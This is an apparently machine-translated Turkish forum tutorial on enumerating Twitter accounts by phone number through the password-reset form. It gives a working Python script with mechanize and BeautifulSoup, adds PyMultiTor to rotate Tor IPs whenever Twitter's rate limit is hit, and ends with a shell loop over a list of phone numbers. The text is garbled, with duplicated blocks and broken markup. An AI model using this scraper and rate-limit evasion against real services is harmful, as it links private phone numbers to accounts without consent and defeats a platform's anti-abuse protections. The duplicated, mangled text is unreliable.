Selamun Aleykum Dostlar. Bu Gunku Calismamimzda Sizlere twitterdeki telefon numaralandirmayi anlatcaz. Tabi biraz zor ama oluyor. Hadi Basladik.
Sokaktaki kelime, account_identifier ile sadece curl / account / begin_password_reset yapabileceğiniz ve bir hesap, bir tür doğru olsaydı geri dönebileceğiniz, ancak Twitter, otantik istekler için bazı jetonlar uyguladığı ve ayrıca 7 veya daha fazla aynı istekler aynı IP'den geliyor. Öyleyse, gerçek hacker ruhunda, bu 'korumaları' ele alalım ve bazı sayıları sıralayalım!
Plan…
Tarayıcı formu doldurma komut dosyası
Twitter'a gönder ve gürültüyü filtrele, sadece hesabımız varsa göster
Twitter'ın bizi engellediğini tespit edersek, yeni bir Tor IP kullanalım
Başlangıç
İhtiyacımız olan tüm bitleri kurma zamanı…
pip install mekanize
pip install bs4
pip install lxml
Talep
Bu bölüm basit, tarayıcı otomasyonunun doğru isteği göndermesi için güzel bir mekanizma kullanabiliriz. Bununla ilgili güzel olan, mechanize'ın normal bir kullanıcının yaptığı gibi gerekli tüm jetonları alacağıdır, bu yüzden burada fazladan çalışma yok.
import sys[/align]
[align=center]import re[/align]
[align=center]from mechanize import Browser[/align]
[align=center]from bs4 import BeautifulSoup[/align]
[align=center]#new browser instance[/align]
[align=center]br = Browser()[/align]
[align=center]#open session in browser[/align]
[align=center]br.open("https://twitter.com/account/begin_password_reset")[/align]
[align=center]#select the first form seen in HTML response[/align]
[align=center]br.select_form(nr=0)[/align]
[align=center]#fill out the correct field value with the first argument to our script, the phone numbers[/align]
[align=center]br.form["account_identifier"] = sys.argv[1][/align]
[align=center]#submits the form[/align]
[align=center]response = br.submit()[/align]
[align=center]#parse the response with lxml and BeautifulSoup[/align]
[align=center]soup = BeautifulSoup(response.read(), "lxml")[/align]
[align=center]#print out the text value found in 'PageHeader' section (result)[/align]
[align=center]for element in soup.find_all(class_='PageHeader'):[/align]
[align=center] print(element.text)
Tam Kod Burada:
https://pastebin.com/aafQQBatSokaktaki kelime, account_identifier ile sadece curl / account / begin_password_reset yapabileceğiniz ve bir hesap, bir tür doğru olsaydı geri dönebileceğiniz, ancak Twitter, otantik istekler için bazı jetonlar uyguladığı ve ayrıca 7 veya daha fazla aynı istekler aynı IP'den geliyor. Öyleyse, gerçek hacker ruhunda, bu 'korumaları' ele alalım ve bazı sayıları sıralayalım!
Plan…
Tarayıcı formu doldurma komut dosyası
Twitter'a gönder ve gürültüyü filtrele, sadece hesabımız varsa göster
Twitter'ın bizi engellediğini tespit edersek, yeni bir Tor IP kullanalım
Başlangıç
İhtiyacımız olan tüm bitleri kurma zamanı…
pip install mekanize
pip install bs4
pip install lxml
Talep
Bu bölüm basit, tarayıcı otomasyonunun doğru isteği göndermesi için güzel bir mekanizma kullanabiliriz. Bununla ilgili güzel olan, mechanize'ın normal bir kullanıcının yaptığı gibi gerekli tüm jetonları alacağıdır, bu yüzden burada fazladan çalışma yok.
import sys[/align]
[align=center]import re[/align]
[align=center]from mechanize import Browser[/align]
[align=center]from bs4 import BeautifulSoup[/align]
[align=center]#new browser instance[/align]
[align=center]br = Browser()[/align]
[align=center]#open session in browser[/align]
[align=center]br.open("https://twitter.com/account/begin_password_reset")[/align]
[align=center]#select the first form seen in HTML response[/align]
[align=center]br.select_form(nr=0)[/align]
[align=center]#fill out the correct field value with the first argument to our script, the phone numbers[/align]
[align=center]br.form["account_identifier"] = sys.argv[1][/align]
[align=center]#submits the form[/align]
[align=center]response = br.submit()[/align]
[align=center]#parse the response with lxml and BeautifulSoup[/align]
[align=center]soup = BeautifulSoup(response.read(), "lxml")[/align]
[align=center]#print out the text value found in 'PageHeader' section (result)[/align]
[align=center]for element in soup.find_all(class_='PageHeader'):[/align]
[align=center] print(element.text)
Tam Kod Burada:
![[Resim: 1 * qgjnNHul8XJLkxOPnPqJnw.png]](https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?container=focus&url=https://miro.medium.com/max/516/1*qgjnNHul8XJLkxOPnPqJnw.png "[Resim: 1 * qgjnNHul8XJLkxOPnPqJnw.png]")
Ama ~ 7 birkaç denemeden sonra bunu elde ediyoruz…
Ama sabırsızız ve zaman pwnage olduğundan, bu sorunu bir Python Çok Dişli Tor Proxy'si olan PyMultitor ile deneyelim ve çözelim…
https://github.com/realgam3/pymultitor
Sadece proxy kullanmak için bir satır ekliyoruz, pymultitor çalıştırmak için yorumlanmış komutu da görebilirsiniz, hata dizesini arar ve tespit edilirse Tor ağından yeni bir IP alır.
twitter-enum.py
import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup
br = Browser()
#https://github.com/realgam3/pymultitor
#pymultitor --on-string "Please try again later."
br.set_proxies({"http": "127.0.0.1:8080"})
br.open("https://twitter.com/account/begin_password_reset")
br.select_form(nr=0)
br.form["account_identifier"] = sys.argv[1]
response = br.submit() # submit current form
soup = BeautifulSoup(response.read(), "lxml")
for element in soup.find_all(class_='PageHeader'):
print(element.text)
Her şey ayarlandığında, telefon numaralarını bir metin dosyasına ekleyin ve bu komutu çalıştırın ...import re
from mechanize import Browser
from bs4 import BeautifulSoup
br = Browser()
#https://github.com/realgam3/pymultitor
#pymultitor --on-string "Please try again later."
br.set_proxies({"http": "127.0.0.1:8080"})
br.open("https://twitter.com/account/begin_password_reset")
br.select_form(nr=0)
br.form["account_identifier"] = sys.argv[1]
response = br.submit() # submit current form
soup = BeautifulSoup(response.read(), "lxml")
for element in soup.find_all(class_='PageHeader'):
print(element.text)
for num in $(cat numlist.txt); do python twitter-enum.py $num; done
